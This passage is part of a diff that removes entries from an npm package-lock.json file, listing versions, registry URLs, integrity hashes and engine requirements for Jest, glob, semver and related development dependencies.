- "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/hpagent": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", - "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", - "license": "MIT", - "engines": { - "node": ">=14" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": 